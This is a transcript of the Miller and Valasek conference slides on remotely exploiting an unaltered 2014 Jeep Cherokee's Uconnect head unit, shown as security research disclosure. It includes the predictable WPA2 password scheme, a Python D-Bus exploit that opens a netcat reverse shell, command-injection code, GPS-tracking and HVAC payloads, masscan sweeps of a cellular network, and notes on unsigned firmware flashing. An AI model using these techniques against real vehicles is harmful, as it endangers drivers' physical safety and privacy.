Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered...
Transcript of Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered...
![Page 1: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/1.jpg)
Remote Exploitation of an Unaltered Passenger Vehicle
Dr. Charlie Miller ([email protected])
Chris Valasek ([email protected])
![Page 2: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/2.jpg)
Introduction
![Page 3: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/3.jpg)
You should know us by now…
Dr. Charlie Miller [Twitter]
Security Engineer@0xcharlie
Chris Valasek [IOActive]
Director of Vehicle Security Research@nudehaberdasher
![Page 4: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/4.jpg)
Disclaimer
• Enjoy the talk• The full details will be in our 90
page white paper
• To be released Aug 10
![Page 5: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/5.jpg)
Public service announcement
Please STOP saying UNHACKABLE,
you’re going to look silly
![Page 6: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/6.jpg)
Overview
• Introduction
• Getting remote code running via Wi-Fi
• Expanding to cellular
• Head unit payloads
• Flashing CAN chip
• Cyberphysical payloads
![Page 7: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/7.jpg)
Remote Attacks
![Page 8: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/8.jpg)
Remote Attack Paradigm
TPMS
Telematics (CDMA/3G/4G/LTE)
Bluetooth
Wi-Fi
In-car apps
1. Remote compromise
Remote keyless entry
![Page 9: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/9.jpg)
Remote Attack Paradigm
Running exploit
CAN / LIN / MOST / Flexray
1. Remote compromise2. Lateralization
![Page 10: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/10.jpg)
Remote Attack Paradigm
Engine
Sensors
Occupant safety
Power Steering
Self-Parking
Radio
Transmission
ABS
CAN / LIN / MOST / Flexray
1. Remote compromise2. Lateralization3. CAN Message analysis (in
advance)
![Page 11: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/11.jpg)
Remote Attack Paradigm
Pre-Collision System
Self-Parking
Adaptive Cruise Control
CAN / LIN / MOST / Flexray
1. Remote compromise2. Lateralization3. CAN Message analysis (in
advance)4. CAN message injection
• Reprogram firmware• Functionality
Running exploit
![Page 12: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/12.jpg)
The Vehicle
![Page 13: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/13.jpg)
2014 Jeep Cherokee
http://www.blogcdn.com/www.autoblog.com/media/2013/02/2014-jeep-cherokee-1.jpg
![Page 14: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/14.jpg)
Uconnect 8.4AN RA4 (Harman Kardon)
![Page 15: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/15.jpg)
Uconnect 8.4AN RA4 (Harman Kardon)
![Page 16: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/16.jpg)
Uconnect 8.4AN RA4 (Harman Kardon)
# pidin info
CPU:ARM Release:6.5.0 FreeMem:91Mb/512Mb BootTime:Jul 30 21:45:38 2014
Processes: 107, Threads: 739
Processor1: 1094697090 Cortex A8 800MHz FPU
![Page 17: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/17.jpg)
Jail Break
![Page 18: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/18.jpg)
Jailbreaking the Uconnect• Was NOT required
for remote exploit
• Was invaluable for gaining knowledge about the OS / services
• NOT, I repeat, NOT needed for remote exploitation
![Page 19: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/19.jpg)
Wi-Fi
![Page 20: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/20.jpg)
![Page 21: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/21.jpg)
Problems with attacks over Wi-Fi• Not on by default
• Need to connect to WPA2 network
![Page 22: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/22.jpg)
WPA2 passwordchar *get_password(){
int c_max = 12;int c_min = 8;
unsigned int t = time(NULL);srand (t);unsigned int len = (rand() % (c_max - c_min + 1)) + c_min;char *password = malloc(len);int v9 = 0; do{
unsigned int v10 = rand();int v11 = convert_byte_to_ascii_letter(v10 % 62);password[v9] = v11;v9++;
} while (len > v9);return password;
![Page 23: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/23.jpg)
Password guessing
• Password based on when unit was first started• With second precision
• We know the year, if you guess the month• 15 million password possibilities
• If you supposed it was during the day• 7 million password possibilities
• Should be possible to brute force in under an hour
![Page 24: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/24.jpg)
Setting the time…local rtcTime = getV850RealtimeClock()
local rtcValid = false
if rtcTime == nil or rtcTime.year == 65535 or rtcTime.month == 255 or rtcTime.day == 255 or
rtcTime.hour == 255 or rtcTime.mi n == 255 or rtcTime.sec == 255 then
dbg.print("Clock: start -- V850 time not received or is set to factory defaults")
...
if rtcValid == false then
dbg.print("Clock: start -- Unable to create the UTC time from V850")
setProperty("timeFormat24", false)
setProperty("enableClock", true)
setProperty("gpsTime", true)
setProperty("manualUtcOffset", 0)
defTime = {}
defTime.year = 2013
defTime.month = 1
defTime.day = 1
defTime.hour = 0
defTime.min = 0
defTime.sec = 0
defTime.isdst = false
setSystemUTCTime(os.time(defTime))
timeFormatOverride = false
enableClockOverride = false
end
![Page 25: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/25.jpg)
Actually its easy!
• My WPA2 password was “TyYMxfPhZxkp”
• This corresponds to Epioch time 0x50e22720
• This is Jan 01 2013 00:00:32 GMT
• Took 32 seconds for WifiSvc to get started up
• Really only a few dozen passwords to try
![Page 26: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/26.jpg)
Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-26 11:23 CDTNmap scan report for 192.168.5.1Host is up (0.0036s latency).PORT STATE SERVICE2011/tcp open raid-cc2021/tcp open servexec4400/tcp open unknown6010/tcp open x116020/tcp open unknown6667/tcp open irc51500/tcp open unknown65200/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
![Page 27: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/27.jpg)
D-Bus
![Page 28: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/28.jpg)
D-Bus: Overview
• Interprocess communications
• Can require authentication• Jeep did NOT
• We used Dfeet to look at services
• Dbus-Python for scripts / exploits
telnet 192.168.5.1 6667Trying 192.168.5.1...
Connected to 192.168.5.1.
Escape character is '^]'.
AUTH ANONYMOUS
OK
4943a53752f52f82a9ea4e6e00000001
BEGIN
![Page 29: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/29.jpg)
D-Bus: Services & Methods
![Page 30: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/30.jpg)
![Page 31: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/31.jpg)
D-Bus: Command Line Injection
function methods.rmTrack(params, context)
return {
result = os.execute("rm \"" .. trail_path_saved ..
params.filename .. "\"")
}
end
NavTrailService
* Many others contained command line injection vulnerabilities
![Page 32: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/32.jpg)
D-Bus: No vulnerability neededNavTrailService
"com.harman.service.NavTrailService":
{"name":"com.harman.service.NavTrailService",
"methods":{"symlinkattributes":"symlinkattributes","getProperties":"getPro
perties","execute":"execute","unlock":"unlock","navExport":"navExport","ls":"
ls","attributes":"attributes“ …
#!python
import dbus
bus_obj=dbus.bus.BusConnection("tcp:host=192.168.5.1,port=6667")
proxy_object=bus_obj.get_object('com.harman.service.NavTrailService','/com/harman/service/NavT
railService')
playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke('execute','{"cmd":"netcat -l -p 6666 | /bin/sh | netcat
192.168.5.109 6666"}')
![Page 33: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/33.jpg)
We basically revealed the vulnerability last year!
![Page 34: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/34.jpg)
Uconnect Payloads
![Page 35: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/35.jpg)
GPS Tracker 3000 #!python
import dbus
bus_obj=dbus.bus.BusConnection("tcp:host=X.X.X.X,port=6667")
proxy_object=bus_obj.get_object('com.harman.service.NDR', '/com/harman/service/NDR')playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke('JSON_GetProperties','{"inprop":["SEN_GPSInfo"]}')
![Page 36: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/36.jpg)
HVACrequire "service"
params = {}control = {}params.zone = "front"control.fan = arg[1]params.controls = control
x=service.invoke("com.harman.service.HVAC","setControlProperties", params)
![Page 37: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/37.jpg)
Radio Volume
require "service"
params = {}params.volume = tonumber(arg[1])x=service.invoke("com.harman.service.AudioSettings", "setVolume", params)
![Page 38: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/38.jpg)
![Page 39: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/39.jpg)
Cellular Exploitation
![Page 40: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/40.jpg)
Netstat Review
# netstat -n | grep LISTEN
tcp 0 0 *.6010 *.* LISTEN
tcp 0 0 *.2011 *.* LISTEN
tcp 0 0 *.6020 *.* LISTEN
tcp 0 0 *.2021 *.* LISTEN
tcp 0 0 127.0.0.1.3128 *.* LISTEN
tcp 0 0 *.51500 *.* LISTEN
tcp 0 0 *.65200 *.* LISTEN
tcp 0 0 *.4400 *.* LISTEN
tcp 0 0 *.6667 *.* LISTEN
![Page 41: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/41.jpg)
Finding the Jeep’s IP
# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 33192
inet 127.0.0.1 netmask 0xff000000
pflog0: flags=100<PROMISC> mtu 33192
uap0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
address: 30:14:4a:ee:a6:f8
media: <unknown type> autoselect
inet 192.168.5.1 netmask 0xffffff00 broadcast 192.168.5.255
ppp0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1472
inet 21.28.103.144 -> 68.28.89.85 netmask 0xff000000
![Page 42: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/42.jpg)
Femto-Cell Comms
• Airave 2.0 • We bought 2 ‘stolen’ ones
before getting a working device (Thanks Ebay!)
• Public Jailbreak (turns on port 23)
• Successful in communicating w/ the Jeep!
• Range ~ 30m
![Page 43: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/43.jpg)
How far?
![Page 44: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/44.jpg)
Long Distance Communications (Sprint)
![Page 45: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/45.jpg)
Searching for Vehicles$ bin/masscan 21.0.0.0/8 –p6667
$ bin/masscan 25.0.0.0/8 –p6667
Discovered open port 6667/tcp on 25.18.2.211
Discovered open port 6667/tcp on 25.36.166.111
Discovered open port 6667/tcp on 25.22.203.32
Discovered open port 6667/tcp on 25.17.146.238
Discovered open port 6667/tcp on 25.22.138.67
Discovered open port 6667/tcp on 25.20.97.217
Discovered open port 6667/tcp on 25.23.97.210
Discovered open port 6667/tcp on 25.33.57.216
Discovered open port 6667/tcp on 25.19.52.6
Discovered open port 6667/tcp on 25.32.29.32
![Page 46: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/46.jpg)
Gathering Vehicle Information
![Page 47: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/47.jpg)
./shutupdave.py
Scanning 21.18.23.0...
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-06-16 19:09:28 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Scan complete
Found 2 hosts
21.18.23.151 : 1C4RJFCMXEXXXXXXX , 2014 JEEP GRAND+CHEROKEE+OVERLAND
21.18.23.97 : 1C6RR7PT8DXXXXXXX , 2013 RAM 1500+LONGHORN
…
![Page 48: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/48.jpg)
Vehicles Located via Scanning
2013 DODGE VIPER2013 RAM 15002013 RAM 25002013 RAM 35002013 RAM CHASSIS 55002014 DODGE DURANGO2014 DODGE VIPER2014 JEEP CHEROKEE2014 JEEP GRAND CHEROKEE2014 RAM 15002014 RAM 25002014 RAM 35002014 RAM CHASSIS 55002015 CHRYSLER 2002015 JEEP CHEROKEE2015 JEEP GRAND CHEROKEE
![Page 49: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/49.jpg)
Vehicle Estimates
• We found 19 duplicate VINs in a scan of 2694
vehicles
• Estimated 381,980 +/- 89,393
• We now know that the real number is 1.4
million. We obviously went with a conservative
estimate
![Page 50: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/50.jpg)
Uconnect firmware (v850)
![Page 51: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/51.jpg)
Now we send CAN messages?
![Page 52: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/52.jpg)
Inside Uconnect
CANSPI
![Page 53: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/53.jpg)
Inside the Uconnect
![Page 54: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/54.jpg)
Updating the V850: Firmware
# iocupdate -c 4 -p usr/share/V850/cmcioc.bin
• V850 firmware is NOT signed
• No code signing mechanism present
• Updating only works if v850 in “bootrom” mode
![Page 55: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/55.jpg)
V850 Internals: CAN Modules & Addressing
http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp
![Page 56: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/56.jpg)
V850 Internals: CAN Registers
http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp
![Page 57: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/57.jpg)
V850 Internals: Base Address
![Page 58: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/58.jpg)
V850 Internals: Segments & Initial Values
![Page 59: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/59.jpg)
V850 Internals: CAN Data Buffer XREFs
![Page 60: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/60.jpg)
V850 Internals: Setting CAN Data Values
![Page 61: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/61.jpg)
V850 Internals: SPI Parser
file = '/dev/ipc/ch7'
g = assert(ipc.open(file))
f = assert(io.open(file, "r+b"))
g:write(0xf0, 0x02)
bytes = f:read(0x18)
print(hex_dump(bytes))
g:close()
f:close()
